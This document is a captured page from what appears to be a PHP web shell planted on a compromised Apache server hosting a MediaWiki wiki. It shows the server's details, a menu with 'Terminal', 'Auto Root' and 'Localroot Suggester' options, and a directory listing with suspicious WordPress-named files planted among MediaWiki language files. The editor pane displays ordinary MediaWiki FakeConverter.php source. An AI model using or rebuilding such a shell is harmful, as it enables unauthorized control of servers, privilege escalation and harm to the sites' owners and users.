Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
wiki.bernardino.org /
languages /
Delete
Unzip
Name
Size
Permission
Date
Action
classes
[ DIR ]
drwxr-xr-x
2016-11-28 20:20
data
[ DIR ]
drwxr-xr-x
2016-11-28 20:20
i18n
[ DIR ]
drwxr-xr-x
2016-11-28 20:20
messages
[ DIR ]
drwxr-xr-x
2016-11-28 20:20
.htaccess
197
B
-r--r--r--
2026-08-22 08:29
ConverterRule.php
13.8
KB
-rw-r--r--
2016-11-28 20:20
FakeConverter.php
2.38
KB
-rw-r--r--
2016-11-28 20:20
Language.php
149.7
KB
-rw-r--r--
2016-11-28 20:20
LanguageConverter.php
30.13
KB
-rw-r--r--
2016-11-28 20:20
Names.php
18.31
KB
-rw-r--r--
2011-10-22 04:46
wp-blog-header.php
2.74
KB
-r--r--r--
2026-08-22 08:29
wp-cron.php
2.74
KB
-rw-r--r--
2026-08-22 08:29
Save
Rename
<?php /** * Internationalisation code. * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License along * with this program; if not, write to the Free Software Foundation, Inc., * 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. * http://www.gnu.org/copyleft/gpl.html * * @file * @ingroup Language */ /** * A fake language converter * * @ingroup Language */ class FakeConverter { /** * @var Language */ public $mLang; function __construct( $langobj ) { $this->mLang = $langobj; } function autoConvert( $text, $variant = false ) { return $text; } function autoConvertToAllVariants( $text ) { return [ $this->mLang->getCode() => $text ]; } function convert( $t ) { return $t; } function convertTo( $text, $variant ) { return $text; } /** * @param Title $t * @return mixed */ function convertTitle( $t ) { return $t->getPrefixedText(); } function convertNamespace( $ns ) { return $this->mLang->getFormattedNsText( $ns ); } function getVariants() { return [ $this->mLang->getCode() ]; } function getVariantFallbacks( $variant ) { return $this->mLang->getCode(); } function getPreferredVariant() { return $this->mLang->getCode(); } function getDefaultVariant() { return $this->mLang->getCode(); } function getURLVariant() { return ''; } function getConvRuleTitle() { return false; } function findVariantLink( &$l, &$n, $ignoreOtherCond = false ) { } function getExtraHashOptions() { return ''; } function getParsedTitle() { return ''; } function markNoConversion( $text, $noParse = false ) { return $text; } function convertCategoryKey( $key ) { return $key; } function validateVariant( $variant = null ) { return $variant === $this->mLang->getCode() ? $variant : null; } function translate( $text, $variant ) { return $text; } public function updateConversionTable( Title $title ) { } }